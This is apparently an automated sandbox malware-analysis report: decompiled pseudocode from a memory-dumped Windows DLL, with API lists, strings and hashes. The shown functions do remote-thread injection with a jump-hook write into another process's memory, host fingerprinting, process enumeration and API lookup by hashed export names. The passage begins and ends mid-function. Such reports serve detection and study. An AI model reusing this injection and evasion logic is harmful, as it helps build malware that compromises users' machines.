					 *0x1001e77c =  *0x1001e77c & 0x00000000;
				}
				_t33 =  *0x1001e784; // 0x0
				if(_t33 != 0) {
					_t35 =  *0x1001e684; // 0x87ff878
					 *((intOrPtr*)(_t35 + 0x10c))(_t33);
					E10008600(0x1001e784, 0xfffffffe);
				}
				return _t74;
			}

APIs

Part of subcall function 1000C4D9: LoadLibraryW.KERNEL32 ref: 1000C5D1
Part of subcall function 1000C4D9: memset.MSVCRT ref: 1000C610

FreeLibrary.KERNEL32(00000000,?,00000000,00000000), ref: 1000CC7E

Part of subcall function 1000C6CB: NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000,10005CD4), ref: 1000C73E
Part of subcall function 1000C6CB: RegisterClassExA.USER32(00000030), ref: 1000C790
Part of subcall function 1000C6CB: CreateWindowExA.USER32 ref: 1000C7BB
Part of subcall function 1000C6CB: DestroyWindow.USER32(00000000), ref: 1000C7C6
Part of subcall function 1000C6CB: UnregisterClassA.USER32 ref: 1000C7D1

memset.MSVCRT ref: 1000CBC3
GetThreadContext.KERNELBASE(?,00010002,?,00000000,00000000), ref: 1000CBE4
NtProtectVirtualMemory.NTDLL(?,?,?,00000004,00000000), ref: 1000CC2D
NtWriteVirtualMemory.NTDLL(?,?,000000E9,00000005,?), ref: 1000CC4A
NtProtectVirtualMemory.NTDLL(?,?,?,00000000,00000000), ref: 1000CC6B

Memory Dump Source

Source File: 00000002.00000002.701441727.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.701429892.0000000010000000.00000002.00020000.sdmp Download File

Similarity

API ID: MemoryVirtual$ClassCreateLibraryProtectWindowmemset$ContextDestroyFreeLoadRegisterSectionThreadUnregisterWrite
String ID:
API String ID: 850789531-0
Opcode ID: 81e1878cde3c01e1741f75c6aa3df445a148ed532b2f4d400af4b30928b6dc9e
Instruction ID: 8dc3fb5d1cfe451f8c4839fb180d38a9adec49fd8f8a3984ebf3c7f861d3db7f
Opcode Fuzzy Hash: 81e1878cde3c01e1741f75c6aa3df445a148ed532b2f4d400af4b30928b6dc9e
Instruction Fuzzy Hash: EA311A72A04219AFFB01DFA4CD89F9EB7B8EF08390F114265E505E61A4D731DE448F90

Uniqueness

Uniqueness Score: -1.00%

Function 1000D02A, Relevance: 35.3, APIs: 15, Strings: 5, Instructions: 282
COMMON

Download Yara Rule

C-Code - Quality: 91%

			E1000D02A(void* __fp0) {
				long _v8;
				long _v12;
				union _SID_NAME_USE _v16;
				struct _SYSTEM_INFO _v52;
				char _v180;
				short _v692;
				char _v704;
				char _v2680;
				void* __esi;
				struct _OSVERSIONINFOA* _t81;
				intOrPtr _t83;
				void* _t84;
				long _t86;
				void** _t88;
				intOrPtr _t90;
				intOrPtr _t91;
				intOrPtr _t92;
				int _t98;
				intOrPtr _t103;
				char* _t105;
				void* _t108;
				intOrPtr _t111;
				long _t115;
				signed int _t117;
				long _t119;
				intOrPtr _t124;
				intOrPtr _t127;
				intOrPtr _t130;
				intOrPtr _t134;
				intOrPtr _t145;
				intOrPtr _t147;
				intOrPtr _t149;
				intOrPtr _t152;
				intOrPtr _t154;
				signed int _t159;
				struct HINSTANCE__* _t162;
				short* _t164;
				intOrPtr _t167;
				WCHAR* _t168;
				char* _t169;
				intOrPtr _t181;
				intOrPtr _t200;
				void* _t215;
				long _t218;
				void* _t219;
				char* _t220;
				struct _OSVERSIONINFOA* _t222;
				void* _t223;
				int* _t224;
				void* _t241;

				_t241 = __fp0;
				_t162 =  *0x1001e69c; // 0x10000000
				_t81 = E100085EA(0x1ac4);
				_t222 = _t81;
				if(_t222 == 0) {
					return _t81;
				}
				 *((intOrPtr*)(_t222 + 0x1640)) = GetCurrentProcessId();
				_t83 =  *0x1001e684; // 0x87ff878
				_t84 =  *((intOrPtr*)(_t83 + 0xa0))(_t215);
				_t3 = _t222 + 0x648; // 0x648
				E1001230C( *((intOrPtr*)(_t222 + 0x1640)) + _t84, _t3);
				_t5 = _t222 + 0x1644; // 0x1644
				_t216 = _t5;
				_t86 = GetModuleFileNameW(0, _t5, 0x105);
				_t227 = _t86;
				if(_t86 != 0) {
					 *((intOrPtr*)(_t222 + 0x1854)) = E10008FA4(_t216, _t227);
				}
				GetCurrentProcess();
				_t88 = E1000B9EB(); // executed
				 *(_t222 + 0x110) = _t88;
				_t178 =  *_t88;
				if(E1000BB73( *_t88) == 0) {
					_t90 = E1000BA48(_t178, _t222); // executed
					__eflags = _t90;
					_t181 = (0 | _t90 > 0x00000000) + 1;
					__eflags = _t181;
					 *((intOrPtr*)(_t222 + 0x214)) = _t181;
				} else {
					 *((intOrPtr*)(_t222 + 0x214)) = 3;
				}
				_t12 = _t222 + 0x220; // 0x220, executed
				_t91 = E1000E3FC(_t12); // executed
				 *((intOrPtr*)(_t222 + 0x218)) = _t91;
				_t92 = E1000E3C1(_t12); // executed
				 *((intOrPtr*)(_t222 + 0x21c)) = _t92;
				 *(_t222 + 0x224) = _t162;
				_v12 = 0x80;
				_v8 = 0x100;
				_t22 = _t222 + 0x114; // 0x114
				if(LookupAccountSidW(0,  *( *(_t222 + 0x110)), _t22,  &_v12,  &_v692,  &_v8,  &_v16) == 0) {
					GetLastError();
				}
				_t98 = GetSystemMetrics(0x1000);
				_t26 = _t222 + 0x228; // 0x228
				 *(_t222 + 0x1850) = 0 | _t98 > 0x00000000;
				GetModuleFileNameW( *(_t222 + 0x224), _t26, 0x105);
				GetLastError();
				_t31 = _t222 + 0x228; // 0x228
				 *((intOrPtr*)(_t222 + 0x434)) = E10008FA4(_t31, _t98);
				_t34 = _t222 + 0x114; // 0x114, executed
				_t103 = E1000B78E(_t34,  &_v692);
				_t35 = _t222 + 0xb0; // 0xb0
				 *((intOrPtr*)(_t222 + 0xac)) = _t103;
				_push(_t35);
				E1000B663(_t103, _t35, _t98, _t241);
				_t37 = _t222 + 0xb0; // 0xb0
				_t105 = _t37;
				_t38 = _t222 + 0xd0; // 0xd0
				_t164 = _t38;
				if(_t105 != 0) {
					_t159 = MultiByteToWideChar(0, 0, _t105, 0xffffffff, _t164, 0x20);
					if(_t159 > 0) {
						_t164[_t159] = 0;
					}
				}
				_t41 = _t222 + 0x438; // 0x438
				_t42 = _t222 + 0x228; // 0x228
				E10008FBE(_t42, _t41);
				_t43 = _t222 + 0xb0; // 0xb0
				_t108 = E1000D40B(_t43, E1000C384(_t43), 0);
				_t44 = _t222 + 0x100c; // 0x100c
				E1000B870(_t108, _t44, _t241);
				_t199 = GetCurrentProcess(); // executed
				_t111 = E1000BBC5(_t110); // executed
				 *((intOrPtr*)(_t222 + 0x101c)) = _t111;
				memset(_t222, 0, 0x9c);
				_t224 = _t223 + 0xc;
				_t222->dwOSVersionInfoSize = 0x9c;
				GetVersionExA(_t222);
				_t167 =  *0x1001e684; // 0x87ff878
				_t115 = 0;
				_v8 = 0;
				if( *((intOrPtr*)(_t167 + 0x6c)) != 0) {
					 *((intOrPtr*)(_t167 + 0x6c))(GetCurrentProcess(),  &_v8);
					_t115 = _v8;
				}
				 *((intOrPtr*)(_t222 + 0xa8)) = _t115;
				if(_t115 == 0) {
					GetSystemInfo( &_v52);
					_t117 = _v52.dwOemId & 0x0000ffff;
				} else {
					_t117 = 9;
				}
				_t54 = _t222 + 0x1020; // 0x1020
				_t168 = _t54;
				 *(_t222 + 0x9c) = _t117;
				GetWindowsDirectoryW(_t168, 0x104);
				_t119 = E100095C7(_t199, 0x10c);
				_t200 =  *0x1001e684; // 0x87ff878
				_t218 = _t119;
				 *_t224 = 0x104;
				_push( &_v704);
				_push(_t218);
				_v8 = _t218;
				if( *((intOrPtr*)(_t200 + 0xe0))() == 0) {
					_t154 =  *0x1001e684; // 0x87ff878
					 *((intOrPtr*)(_t154 + 0xfc))(_t218, _t168);
				}
				E100085BB( &_v8);
				_t124 =  *0x1001e684; // 0x87ff878
				_t61 = _t222 + 0x1434; // 0x1434
				_t219 = _t61;
				 *_t224 = 0x209;
				_push(_t219);
				_push(L"USERPROFILE");
				if( *((intOrPtr*)(_t124 + 0xe0))() == 0) {
					E10009626(_t219, 0x105, L"%s\\%s", _t168);
					_t152 =  *0x1001e684; // 0x87ff878
					_t224 =  &(_t224[5]);
					 *((intOrPtr*)(_t152 + 0xfc))(L"USERPROFILE", _t219, "TEMP");
				}
				_push(0x20a);
				_t64 = _t222 + 0x122a; // 0x122a
				_t169 = L"TEMP";
				_t127 =  *0x1001e684; // 0x87ff878
				_push(_t169);
				if( *((intOrPtr*)(_t127 + 0xe0))() == 0) {
					_t149 =  *0x1001e684; // 0x87ff878
					 *((intOrPtr*)(_t149 + 0xfc))(_t169, _t219);
				}
				_push(0x40);
				_t220 = L"SystemDrive";
				_push( &_v180);
				_t130 =  *0x1001e684; // 0x87ff878
				_push(_t220);
				if( *((intOrPtr*)(_t130 + 0xe0))() == 0) {
					_t147 =  *0x1001e684; // 0x87ff878
					 *((intOrPtr*)(_t147 + 0xfc))(_t220, L"C:");
				}
				_v8 = 0x7f;
				_t72 = _t222 + 0x199c; // 0x199c
				_t134 =  *0x1001e684; // 0x87ff878
				 *((intOrPtr*)(_t134 + 0xb0))(_t72,  &_v8);
				_t75 = _t222 + 0x100c; // 0x100c
				E1001230C(E1000D40B(_t75, E1000C384(_t75), 0),  &_v2680);
				_t76 = _t222 + 0x1858; // 0x1858
				E100122DE( &_v2680, _t76, 0x20);
				_t79 = _t222 + 0x1878; // 0x1878
				E10009013(1, _t79, 0x14, 0x1e,  &_v2680);
				_t145 = E1000CD3E(_t79); // executed
				 *((intOrPtr*)(_t222 + 0x1898)) = _t145;
				return _t222;
			}

0x1000d02a
0x1000d034
0x1000d040
0x1000d045
0x1000d04a
0x1000d40a
0x1000d40a
0x1000d057
0x1000d05d
0x1000d062
0x1000d068
0x1000d078
0x1000d084
0x1000d084
0x1000d08d
0x1000d093
0x1000d095
0x1000d09e
0x1000d09e
0x1000d0aa
0x1000d0ae
0x1000d0b3
0x1000d0b9
0x1000d0c2
0x1000d0d0
0x1000d0d7
0x1000d0dc
0x1000d0dc
0x1000d0dd
0x1000d0c4
0x1000d0c4
0x1000d0c4
0x1000d0e3
0x1000d0e9
0x1000d0ee
0x1000d0f4
0x1000d0fc
0x1000d106
0x1000d113
0x1000d11e
0x1000d126
0x1000d147
0x1000d149
0x1000d149
0x1000d155
0x1000d161
0x1000d171
0x1000d177
0x1000d17d
0x1000d17f
0x1000d190
0x1000d196
0x1000d19c
0x1000d1a1
0x1000d1a7
0x1000d1ad
0x1000d1b2
0x1000d1b7
0x1000d1b7
0x1000d1bd
0x1000d1bd
0x1000d1c6
0x1000d1d2
0x1000d1da
0x1000d1de
0x1000d1de
0x1000d1da
0x1000d1e2
0x1000d1e8
0x1000d1ee
0x1000d1f5
0x1000d206
0x1000d20c
0x1000d214
0x1000d21b
0x1000d21d
0x1000d22e
0x1000d234
0x1000d239
0x1000d23c
0x1000d23f
0x1000d245
0x1000d24b
0x1000d24d
0x1000d253
0x1000d25c
0x1000d25f
0x1000d25f
0x1000d262
0x1000d26a
0x1000d275
0x1000d27b
0x1000d26c
0x1000d26e
0x1000d26e
0x1000d284
0x1000d284
0x1000d28a
0x1000d292
0x1000d29d
0x1000d2a2
0x1000d2a8
0x1000d2aa
0x1000d2b7
0x1000d2b8
0x1000d2b9
0x1000d2c4
0x1000d2c6
0x1000d2cd
0x1000d2cd
0x1000d2d7
0x1000d2dc
0x1000d2e1
0x1000d2e1
0x1000d2e7
0x1000d2ee
0x1000d2ef
0x1000d2fc
0x1000d30f
0x1000d314
0x1000d319
0x1000d322
0x1000d322
0x1000d328
0x1000d32d
0x1000d333
0x1000d339
0x1000d33e
0x1000d347
0x1000d349
0x1000d350
0x1000d350
0x1000d356
0x1000d35e
0x1000d363
0x1000d364
0x1000d369
0x1000d372
0x1000d374
0x1000d37f
0x1000d37f
0x1000d388
0x1000d390
0x1000d397
0x1000d39c
0x1000d3ab
0x1000d3c3
0x1000d3ca
0x1000d3d8
0x1000d3ea
0x1000d3f1
0x1000d3f9
0x1000d3fe
0x00000000

APIs

Part of subcall function 100085EA: RtlAllocateHeap.NTDLL(00000008,?,?,10008F6A,00000100,?,10005FA8), ref: 100085F8

GetCurrentProcessId.KERNEL32 ref: 1000D051
GetModuleFileNameW.KERNEL32(00000000,00001644,00000105), ref: 1000D08D
GetCurrentProcess.KERNEL32 ref: 1000D0AA
LookupAccountSidW.ADVAPI32(00000000,?,00000114,00000080,?,?,?), ref: 1000D13C
GetLastError.KERNEL32 ref: 1000D149
GetSystemMetrics.USER32(00001000), ref: 1000D155
GetModuleFileNameW.KERNEL32(?,00000228,00000105), ref: 1000D177
GetLastError.KERNEL32 ref: 1000D17D
MultiByteToWideChar.KERNEL32(00000000,00000000,000000B0,000000FF,000000D0,00000020), ref: 1000D1D2
GetCurrentProcess.KERNEL32 ref: 1000D219

Part of subcall function 1000BA48: FindCloseChangeNotification.KERNELBASE(?,00000000,73BCF500,10000000), ref: 1000BAEC

memset.MSVCRT ref: 1000D234
GetVersionExA.KERNEL32(00000000), ref: 1000D23F
GetCurrentProcess.KERNEL32(00000100), ref: 1000D259
GetSystemInfo.KERNEL32(?), ref: 1000D275
GetWindowsDirectoryW.KERNEL32(00001020,00000104), ref: 1000D292

Strings

TEMP, xrefs: 1000D333, 1000D33E, 1000D34F
%s\%s, xrefs: 1000D304
SystemDrive, xrefs: 1000D35E, 1000D369, 1000D37E
TEMP, xrefs: 1000D2FE
USERPROFILE, xrefs: 1000D2EF, 1000D31D

Memory Dump Source

Source File: 00000002.00000002.701441727.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.701429892.0000000010000000.00000002.00020000.sdmp Download File

Similarity

API ID: CurrentProcess$ErrorFileLastModuleNameSystem$AccountAllocateByteChangeCharCloseDirectoryFindHeapInfoLookupMetricsMultiNotificationVersionWideWindowsmemset
String ID: %s\%s$SystemDrive$TEMP$TEMP$USERPROFILE
API String ID: 3085892711-2706916422
Opcode ID: c2d3c725b07398553a8c383ccebc211cfb4a2dc76306630acd40452e3f2717f5
Instruction ID: 5888c9f6af661bcb9cc61cc2503a615177fd6cb5ab4d5a94d274bd65592933d8
Opcode Fuzzy Hash: c2d3c725b07398553a8c383ccebc211cfb4a2dc76306630acd40452e3f2717f5
Instruction Fuzzy Hash: 7DB15A75600709AFE714EB74CC89FEA77E8EF18380F01482EF55AD7195EB70AA448B21

Uniqueness

Uniqueness Score: -1.00%

Function 10005F6A, Relevance: 12.1, APIs: 8, Instructions: 104
threadCOMMON

Download Yara Rule

C-Code - Quality: 82%

			_entry_(void* __edx, struct HINSTANCE__* _a4, WCHAR* _a8) {
				long _v8;
				char _v16;
				short _v144;
				short _v664;
				void* _t20;
				struct HINSTANCE__* _t23;
				long _t24;
				long _t25;
				char* _t29;
				WCHAR* _t34;
				long _t35;
				void* _t40;
				void* _t52;
				struct _SECURITY_ATTRIBUTES* _t56;
				void* _t57;
				intOrPtr* _t58;
				void* _t60;

				_t52 = __edx;
				if(_a8 != 1) {
					if(_a8 == 0) {
						TerminateThread( *0x1001e6a8, 0);
					}
					L15:
					return 1;
				}
				E100085D5();
				_t20 = E100097F2( &_v16);
				_t60 = _t52;
				if(_t60 < 0 || _t60 <= 0 && _t20 < 0x2e830) {
					goto L15;
				} else {
					E10008F5E();
					GetModuleHandleA(0);
					_t23 = _a4;
					 *0x1001e69c = _t23;
					_t24 = GetModuleFileNameW(_t23,  &_v664, 0x104);
					_t25 = GetLastError();
					if(_t24 == 0 || _t25 == 0x7a) {
						L10:
						return 0;
					} else {
						memset( &_v144, 0, 0x80);
						_t58 = _t57 + 0xc;
						_t56 = 0;
						do {
							_t29 = E100095AD(_t56);
							_a8 = _t29;
							MultiByteToWideChar(0, 0, _t29, 0xffffffff,  &_v144, 0x3f);
							E100085A8( &_a8);
							_t56 =  &(_t56->nLength);
						} while (_t56 < 0x2710);
						E10012A66( *0x1001e69c);
						 *_t58 = 0x7c3;
						 *0x1001e684 = E1000E1C7(0x1001ba20, 0x11c);
						 *_t58 = 0xb4e;
						_t34 = E100095C7(0x1001ba20);
						_a8 = _t34;
						_t35 = GetFileAttributesW(_t34); // executed
						_push( &_a8);
						if(_t35 == 0xffffffff) {
							E100085BB();
							_v8 = 0;
							_t40 = CreateThread(0, 0, E10005DEE, 0, 0,  &_v8);
							 *0x1001e6a8 = _t40;
							if(_t40 != 0) {
								goto L15;
							}
							goto L10;
						}
						E100085BB();
						goto L10;
					}
				}
			}

APIs

TerminateThread.KERNELBASE(00000000), ref: 100060B6

Part of subcall function 100085D5: HeapCreate.KERNELBASE(00000000,00080000,00000000,10005F84), ref: 100085DE

Part of subcall function 100097F2: GetSystemTimeAsFileTime.KERNEL32(?,?,10005F8C), ref: 100097FF

GetModuleHandleA.KERNEL32(00000000), ref: 10005FA9
GetModuleFileNameW.KERNEL32(?,?,00000104), ref: 10005FC4
GetLastError.KERNEL32 ref: 10005FCC
memset.MSVCRT ref: 10005FF0
MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,000000FF,?,0000003F), ref: 10006012
GetFileAttributesW.KERNELBASE(00000000), ref: 10006060
CreateThread.KERNELBASE(00000000,00000000,10005DEE,00000000,00000000,?), ref: 10006094

Memory Dump Source

Source File: 00000002.00000002.701441727.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.701429892.0000000010000000.00000002.00020000.sdmp Download File

Similarity

API ID: File$CreateModuleThreadTime$AttributesByteCharErrorHandleHeapLastMultiNameSystemTerminateWidememset
String ID:
API String ID: 1832041143-0
Opcode ID: 7e808ea799e680f3c2fd863b6732618b7865da000cb2eca94c581aef9a0140a7
Instruction ID: a20790f259ae4b3f06c91942fa7be99be5cb131edc2f008d1ecb11abc9cb9497
Opcode Fuzzy Hash: 7e808ea799e680f3c2fd863b6732618b7865da000cb2eca94c581aef9a0140a7
Instruction Fuzzy Hash: 2631C275840154ABFB11DB20CC89EAE37B9EB487A0F20C529F859D6195EB34AB45CB22

Uniqueness

Uniqueness Score: -1.00%

Function 1000B78E, Relevance: 7.6, APIs: 5, Instructions: 83
stringCOMMON

Download Yara Rule

C-Code - Quality: 94%

			E1000B78E(WCHAR* __ecx, void* __edx) {
				long _v8;
				long _v12;
				WCHAR* _v16;
				short _v528;
				short _v1040;
				short _v1552;
				intOrPtr _t23;
				WCHAR* _t27;
				signed int _t29;
				void* _t33;
				long _t38;
				WCHAR* _t43;
				WCHAR* _t56;

				_t44 = __ecx;
				_v8 = _v8 & 0x00000000;
				_t43 = __edx;
				_t56 = __ecx;
				memset(__edx, 0, 0x100);
				_v12 = 0x100;
				_t23 =  *0x1001e684; // 0x87ff878
				 *((intOrPtr*)(_t23 + 0xb0))( &_v528,  &_v12);
				lstrcpynW(_t43,  &_v528, 0x100);
				_t27 = E100095C7(_t44, 0xa88);
				_v16 = _t27;
				_t29 = GetVolumeInformationW(_t27,  &_v1552, 0x100,  &_v8, 0, 0,  &_v1040, 0x100);
				asm("sbb eax, eax");
				_v8 = _v8 &  ~_t29;
				E100085BB( &_v16);
				_t33 = E1000C39D(_t43);
				E10009626( &(_t43[E1000C39D(_t43)]), 0x100 - _t33, L"%u", _v8);
				lstrcatW(_t43, _t56);
				_t38 = E1000C39D(_t43);
				_v12 = _t38;
				CharUpperBuffW(_t43, _t38);
				return E1000D40B(_t43, E1000C39D(_t43) + _t40, 0);
			}

APIs

memset.MSVCRT ref: 1000B7AB
lstrcpynW.KERNEL32(?,?,00000100), ref: 1000B7D5
GetVolumeInformationW.KERNELBASE(00000000,?,00000100,00000000,00000000,00000000,?,00000100), ref: 1000B807

Part of subcall function 10009626: _vsnwprintf.MSVCRT ref: 10009643

lstrcatW.KERNEL32(?,00000114), ref: 1000B840
CharUpperBuffW.USER32(?,00000000), ref: 1000B852

Memory Dump Source

Source File: 00000002.00000002.701441727.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.701429892.0000000010000000.00000002.00020000.sdmp Download File

Similarity

API ID: BuffCharInformationUpperVolume_vsnwprintflstrcatlstrcpynmemset
String ID:
API String ID: 455400327-0
Opcode ID: b942919f709bbc5ee76562d8b93a0ca6cadf47ed1a8cc120fd559aea66f26d5c
Instruction ID: 54ded0e5f58a315f66d10a54a7c6d114594958cb431f06a38f87ddf0e98dcf8a
Opcode Fuzzy Hash: b942919f709bbc5ee76562d8b93a0ca6cadf47ed1a8cc120fd559aea66f26d5c
Instruction Fuzzy Hash: 0F2153B6900218BFE714DBB4CC8AFEE77BCEB58250F108569F505D6185EA74AF448B60

Uniqueness

Uniqueness Score: -1.00%

Function 1000AB89, Relevance: 7.6, APIs: 5, Instructions: 65
processCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E1000AB89(intOrPtr __ecx, void* __edx) {
				void* _v304;
				void* _v308;
				signed int _t14;
				signed int _t15;
				void* _t22;
				intOrPtr _t28;
				void* _t31;
				intOrPtr _t33;
				void* _t40;
				void* _t42;

				_t33 = __ecx;
				_t31 = __edx; // executed
				_t14 = CreateToolhelp32Snapshot(2, 0);
				_t42 = _t14;
				_t15 = _t14 | 0xffffffff;
				if(_t42 != _t15) {
					memset( &_v304, 0, 0x128);
					_v304 = 0x128;
					if(Process32First(_t42,  &_v304) != 0) {
						while(1) {
							_t22 = E1000CCCB(_t33,  &_v308, _t31); // executed
							_t40 = _t22;
							if(_t40 == 0) {
								break;
							}
							_t33 =  *0x1001e684; // 0x87ff878
							if(Process32Next(_t42,  &_v308) != 0) {
								continue;
							}
							break;
						}
						FindCloseChangeNotification(_t42);
						_t15 = 0 | _t40 == 0x00000000;
					} else {
						_t28 =  *0x1001e684; // 0x87ff878
						 *((intOrPtr*)(_t28 + 0x30))(_t42);
						_t15 = 0xfffffffe;
					}
				}
				return _t15;
			}

APIs

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00000011,?,00000010), ref: 1000ABA3
memset.MSVCRT ref: 1000ABBC
Process32First.KERNEL32(00000000,?), ref: 1000ABD3
Process32Next.KERNEL32(00000000,?), ref: 1000AC07
FindCloseChangeNotification.KERNELBASE(00000000), ref: 1000AC14

Memory Dump Source

Source File: 00000002.00000002.701441727.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.701429892.0000000010000000.00000002.00020000.sdmp Download File

Similarity

API ID: Process32$ChangeCloseCreateFindFirstNextNotificationSnapshotToolhelp32memset
String ID:
API String ID: 2518216231-0
Opcode ID: b96f3aeff797ebc95a186c73b0c318709a57fc9dd53ef4a83a583534a18eeda1
Instruction ID: 12e21ce9a58b3ff76d4a50db47e98f108d0fce0e5cc8861effe551863d451460
Opcode Fuzzy Hash: b96f3aeff797ebc95a186c73b0c318709a57fc9dd53ef4a83a583534a18eeda1
Instruction Fuzzy Hash: 261194722047516BE310DBA8CC89E9F37DCEB863A0F560A29F514C7185EB30D8058762

Uniqueness

Uniqueness Score: -1.00%

Function 1000DFB8, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 95
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E1000DFB8(void* __ecx, intOrPtr __edx) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				char _v92;
				intOrPtr _t41;
				signed int _t47;
				signed int _t49;
				signed int _t51;
				void* _t56;
				struct HINSTANCE__* _t58;
				_Unknown_base(*)()* _t59;
				intOrPtr _t60;
				void* _t62;
				intOrPtr _t63;
				void* _t69;
				char _t70;
				void* _t75;
				CHAR* _t80;
				void* _t82;

				_t75 = __ecx;
				_v12 = __edx;
				_t60 =  *((intOrPtr*)(__ecx + 0x3c));
				_t41 =  *((intOrPtr*)(_t60 + __ecx + 0x78));
				if(_t41 == 0) {
					L4:
					return 0;
				}
				_t62 = _t41 + __ecx;
				_v24 =  *((intOrPtr*)(_t62 + 0x24)) + __ecx;
				_t73 =  *((intOrPtr*)(_t62 + 0x20)) + __ecx;
				_t63 =  *((intOrPtr*)(_t62 + 0x18));
				_v28 =  *((intOrPtr*)(_t62 + 0x1c)) + __ecx;
				_t47 = 0;
				_v20 =  *((intOrPtr*)(_t62 + 0x20)) + __ecx;
				_v8 = 0;
				_v16 = _t63;
				if(_t63 == 0) {
					goto L4;
				} else {
					goto L2;
				}
				while(1) {
					L2:
					_t49 = E1000D40B( *((intOrPtr*)(_t73 + _t47 * 4)) + _t75, E1000C384( *((intOrPtr*)(_t73 + _t47 * 4)) + _t75), 0);
					_t51 = _v8;
					if((_t49 ^ 0x218fe95b) == _v12) {
						break;
					}
					_t73 = _v20;
					_t47 = _t51 + 1;
					_v8 = _t47;
					if(_t47 < _v16) {
						continue;
					}
					goto L4;
				}
				_t69 =  *((intOrPtr*)(_t60 + _t75 + 0x78)) + _t75;
				_t80 =  *((intOrPtr*)(_v28 + ( *(_v24 + _t51 * 2) & 0x0000ffff) * 4)) + _t75;
				if(_t80 < _t69 || _t80 >=  *((intOrPtr*)(_t60 + _t75 + 0x7c)) + _t69) {
					return _t80;
				} else {
					_t56 = 0;
					while(1) {
						_t70 = _t80[_t56];
						if(_t70 == 0x2e || _t70 == 0) {
							break;
						}
						 *((char*)(_t82 + _t56 - 0x58)) = _t70;
						_t56 = _t56 + 1;
						if(_t56 < 0x40) {
							continue;
						}
						break;
					}
					 *((intOrPtr*)(_t82 + _t56 - 0x58)) = 0x6c6c642e;
					 *((char*)(_t82 + _t56 - 0x54)) = 0;
					if( *((char*)(_t56 + _t80)) != 0) {
						_t80 =  &(( &(_t80[1]))[_t56]);
					}
					_t40 =  &_v92; // 0x6c6c642e
					_t58 = LoadLibraryA(_t40); // executed
					if(_t58 == 0) {
						goto L4;
					}
					_t59 = GetProcAddress(_t58, _t80);
					if(_t59 == 0) {
						goto L4;
					}
					return _t59;
				}
			}

APIs

LoadLibraryA.KERNELBASE(.dll,1000604A,0000011C,00000000), ref: 1000E088
GetProcAddress.KERNEL32(00000000,8DF08B59), ref: 1000E094

Strings

.dll, xrefs: 1000E084, 1000E087

Memory Dump Source

Source File: 00000002.00000002.701441727.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.701429892.0000000010000000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressLibraryLoadProc
String ID: .dll
API String ID: 2574300362-2738580789
Opcode ID: a4feeca1574f2cd99d59b1fbc4639384f3d17a533a0fe7c5f4faee7675ce88ca
Instruction ID: 92068ddf64b08cb5eb3d3d525696bfeba362b6a2b2ffb4815a15ed8f4a6c1621
Opcode Fuzzy Hash: a4feeca1574f2cd99d59b1fbc4639384f3d17a533a0fe7c5f4faee7675ce88ca
Instruction Fuzzy Hash: 9831F535A002999BEB54CF69C8C47AEBBF5EF44384F244469D945E7209DBB0ED82CB90

Uniqueness

Uniqueness Score: -1.00%

Function 1000CA30, Relevance: 4.6, APIs: 3, Instructions: 120
threadCOMMON

Download Yara Rule

C-Code - Quality: 89%

			E1000CA30(intOrPtr __edx) {
				signed int _v8;
				intOrPtr _v12;
				signed int _v16;
				intOrPtr _v20;
				char _v24;
				void* _v36;
				char _v40;
				char _v80;
				char _t37;
				intOrPtr _t38;
				void* _t45;
				intOrPtr _t47;
				intOrPtr _t48;
				intOrPtr _t50;
				intOrPtr _t52;
				void* _t54;
				intOrPtr _t57;
				long _t61;
				intOrPtr _t62;
				signed int _t65;
				signed int _t68;
				signed int _t82;
				void* _t85;
				char _t86;

				_v8 = _v8 & 0x00000000;
				_v20 = __edx;
				_t65 = 0;
				_t37 = E1000C908( &_v8);
				_t86 = _t37;
				_v24 = _t86;
				_t87 = _t86;
				if(_t86 == 0) {
					return _t37;
				}
				_t38 =  *0x1001e688; // 0x87804a0
				E1000A853( &_v80,  *((intOrPtr*)(_t38 + 0xac)) + 7, _t87);
				_t82 = _v8;
				_t68 = 0;
				_v16 = 0;
				if(_t82 == 0) {
					L20:
					E10008600( &_v24, 0);
					return _t65;
				}
				while(_t65 == 0) {
					while(_t65 == 0) {
						asm("stosd");
						asm("stosd");
						asm("stosd");
						asm("stosd");
						_t45 = E1000AE4C( *((intOrPtr*)(_t86 + _t68 * 4)),  &_v40); // executed
						_t92 = _t45;
						if(_t45 >= 0) {
							_t54 = E1000CB82(E10005CD4,  &_v40, _t92, _v20); // executed
							if(_t54 != 0) {
								_t57 =  *0x1001e684; // 0x87ff878
								_t85 =  *((intOrPtr*)(_t57 + 0xc4))(0, 0, 0,  &_v80);
								if(_t85 != 0) {
									GetLastError();
									_t61 = ResumeThread(_v36);
									_t62 =  *0x1001e684; // 0x87ff878
									if(_t61 != 0) {
										_push(0xea60);
										_push(_t85);
										if( *((intOrPtr*)(_t62 + 0x2c))() == 0) {
											_t65 = _t65 + 1;
										}
										_t62 =  *0x1001e684; // 0x87ff878
									}
									FindCloseChangeNotification(_t85);
								}
							}
						}
						if(_v40 != 0) {
							if(_t65 == 0) {
								_t52 =  *0x1001e684; // 0x87ff878
								 *((intOrPtr*)(_t52 + 0x104))(_v40, _t65);
							}
							_t48 =  *0x1001e684; // 0x87ff878
							 *((intOrPtr*)(_t48 + 0x30))(_v36);
							_t50 =  *0x1001e684; // 0x87ff878
							 *((intOrPtr*)(_t50 + 0x30))(_v40);
						}
						_t68 = _v16;
						_t47 = _v12 + 1;
						_v12 = _t47;
						if(_t47 < 2) {
							continue;
						} else {
							break;
						}
					}
					_t82 = _v8;
					_t68 = _t68 + 1;
					_v16 = _t68;
					if(_t68 < _t82) {
						continue;
					} else {
						break;
					}
					do {
						goto L19;
					} while (_t82 != 0);
					goto L20;
				}
				L19:
